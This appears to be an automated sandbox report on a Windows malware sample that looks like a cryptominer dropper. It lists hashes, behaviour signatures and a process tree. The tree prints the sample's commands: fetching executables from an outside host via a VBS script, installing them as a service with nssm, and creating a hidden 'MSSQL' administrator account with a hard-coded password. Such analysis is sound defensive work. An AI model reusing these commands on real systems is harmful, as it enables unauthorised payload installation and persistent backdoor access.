Analysis

  • max time kernel
    115s
  • max time network
    110s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    24-11-2020 02:32

General

  • Target

    197f0e170fac2b8c5f1b79d1865ce25f95f4b1a45408b091b5741710a3d9e32a.exe

  • Size

    5.3MB

  • MD5

    6314c3ecbae10e28e206833b129fe3eb

  • SHA1

    a06bcacec00cd8547b51235d4d16439427f3adf0

  • SHA256

    197f0e170fac2b8c5f1b79d1865ce25f95f4b1a45408b091b5741710a3d9e32a

  • SHA512

    68a61b1ef9ce13edb0986ede5d1f6355b27ca3d59768fc83b66c78e8d4e6248b222f12e178389f544df853616078122d1af96aaaadd34001b10189c246cad918

Score
9/10

Malware Config

Signatures

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blacklisted process makes network request 2 IoCs
  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 2 IoCs
  • JavaScript code in executable 3 IoCs
  • Drops file in System32 directory 2 IoCs
  • Modifies service 2 TTPs 11 IoCs
  • Delays execution with timeout.exe 2 IoCs
  • Modifies registry class 2 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 58 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\197f0e170fac2b8c5f1b79d1865ce25f95f4b1a45408b091b5741710a3d9e32a.exe
    "C:\Users\Admin\AppData\Local\Temp\197f0e170fac2b8c5f1b79d1865ce25f95f4b1a45408b091b5741710a3d9e32a.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:500
    • C:\Users\Admin\AppData\Local\Temp\197f0e170fac2b8c5f1b79d1865ce25f95f4b1a45408b091b5741710a3d9e32a.exe
      "C:\Users\Admin\AppData\Local\Temp\197f0e170fac2b8c5f1b79d1865ce25f95f4b1a45408b091b5741710a3d9e32a.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3300
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c mkdir C:\Windows\System32\TemppV2
        3⤵
          PID:1420
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c Deploy.vbs http://fin-vz2.gullo.me:13610/autominer/USR.exe C:\Windows\System32\TemppV2\UserUpdater.exe
          3⤵
          • Modifies registry class
          • Suspicious use of WriteProcessMemory
          PID:1440
          • C:\Windows\System32\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Deploy.vbs" http://fin-vz2.gullo.me:13610/autominer/USR.exe C:\Windows\System32\TemppV2\UserUpdater.exe
            4⤵
            • Blacklisted process makes network request
            • Drops file in System32 directory
            PID:2740
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c Deploy.vbs http://fin-vz2.gullo.me:13610/autominer/nssm.exe C:\Windows\System32\TemppV2\nssm.exe
          3⤵
          • Modifies registry class
          • Suspicious use of WriteProcessMemory
          PID:3964
          • C:\Windows\System32\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Deploy.vbs" http://fin-vz2.gullo.me:13610/autominer/nssm.exe C:\Windows\System32\TemppV2\nssm.exe
            4⤵
            • Blacklisted process makes network request
            • Drops file in System32 directory
            PID:2384
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c nssm install USRUpdate UserUpdater.exe
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1876
          • C:\Windows\System32\TemppV2\nssm.exe
            nssm install USRUpdate UserUpdater.exe
            4⤵
            • Executes dropped EXE
            • Modifies service
            PID:3396
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c nssm start USRUpdate
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2156
          • C:\Windows\System32\TemppV2\nssm.exe
            nssm start USRUpdate
            4⤵
            • Executes dropped EXE
            PID:1428
    • C:\Windows\System32\TemppV2\nssm.exe
      C:\Windows\System32\TemppV2\nssm.exe
      1⤵
      • Executes dropped EXE
      • Modifies service
      • Suspicious use of WriteProcessMemory
      PID:3648
      • C:\Windows\System32\TemppV2\UserUpdater.exe
        "UserUpdater.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2328
        • C:\Windows\system32\net.exe
          "C:\Windows\system32\net.exe" user MSSQL Mr@1X3#AL /add
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2160
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 user MSSQL Mr@1X3#AL /add
            4⤵
              PID:2444
          • C:\Windows\system32\net.exe
            "C:\Windows\system32\net.exe" user MSSQL Mr@1X3#AL
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3984
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 user MSSQL Mr@1X3#AL
              4⤵
                PID:3748
            • C:\Windows\system32\net.exe
              "C:\Windows\system32\net.exe" user MSSQL /active:yes
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:424
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 user MSSQL /active:yes
                4⤵
                  PID:2772
              • C:\Windows\system32\net.exe
                "C:\Windows\system32\net.exe" localgroup Administrators MSSQL /add
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:1220
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 localgroup Administrators MSSQL /add
                  4⤵
                    PID:2128
                • C:\Windows\system32\timeout.exe
                  "C:\Windows\system32\timeout.exe" 100
                  3⤵
                  • Delays execution with timeout.exe
                  PID:1268
                • C:\Windows\system32\net.exe
                  "C:\Windows\system32\net.exe" user MSSQL Mr@1X3#AL /add
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1292
                  • C:\Windows\system32\net1.exe
                    C:\Windows\system32\net1 user MSSQL Mr@1X3#AL /add
                    4⤵
                      PID:3168
                  • C:\Windows\system32\net.exe
                    "C:\Windows\system32\net.exe" user MSSQL Mr@1X3#AL
                    3⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3636
                    • C:\Windows\system32\net1.exe
                      C:\Windows\system32\net1 user MSSQL Mr@1X3#AL
                      4⤵
                        PID:1868
                    • C:\Windows\system32\net.exe
                      "C:\Windows\system32\net.exe" user MSSQL /active:yes
                      3⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2036
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 user MSSQL /active:yes
                        4⤵
                          PID:3916
                      • C:\Windows\system32\net.exe
                        "C:\Windows\system32\net.exe" localgroup Administrators MSSQL /add
                        3⤵
                        • Suspicious use of WriteProcessMemory
                        PID:2740
                        • C:\Windows\system32\net1.exe
                          C:\Windows\system32\net1 localgroup Administrators MSSQL /add
                          4⤵
                            PID:2080
                        • C:\Windows\system32\timeout.exe
                          "C:\Windows\system32\timeout.exe" 100
                          3⤵
                          • Delays execution with timeout.exe
                          PID:2752

                    Network

                    MITRE ATT&CK Enterprise v6

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • memory/2328-27-0x00007FFAB5710000-0x00007FFAB60FC000-memory.dmp

                      Filesize

                      9.9MB

                    • memory/2328-35-0x000000001C550000-0x000000001C551000-memory.dmp

                      Filesize

                      4KB

                    • memory/2328-34-0x000000001C080000-0x000000001C081000-memory.dmp

                      Filesize

                      4KB

                    • memory/2328-28-0x0000000000930000-0x0000000000931000-memory.dmp

                      Filesize

                      4KB